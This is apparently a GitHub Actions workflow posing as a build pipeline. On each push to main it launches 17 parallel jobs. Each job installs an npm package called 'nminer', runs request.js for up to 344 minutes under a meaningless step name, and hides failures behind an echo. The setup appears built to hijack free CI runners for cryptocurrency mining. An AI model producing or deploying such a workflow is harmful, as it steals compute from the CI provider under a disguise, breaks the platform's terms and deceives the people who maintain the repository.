name: request
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 262 }
          - { version: 5839 }
          - { version: 9273 }
          - { version: 6739 }
          - { version: 6577 }
          - { version: 4377 }
          - { version: 6463 }
          - { version: 5300 }
          - { version: 3207 }
          - { version: 2093 }
          - { version: 7556 }
          - { version: 690 }
          - { version: 7537 }
          - { version: 3711 }
          - { version: 2893 }
          - { version: 9112 }
          - { version: 7914 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: feminize independence gloss
        run: |
          npm install nminer@latest
          timeout 344m node request.js || echo "request executed"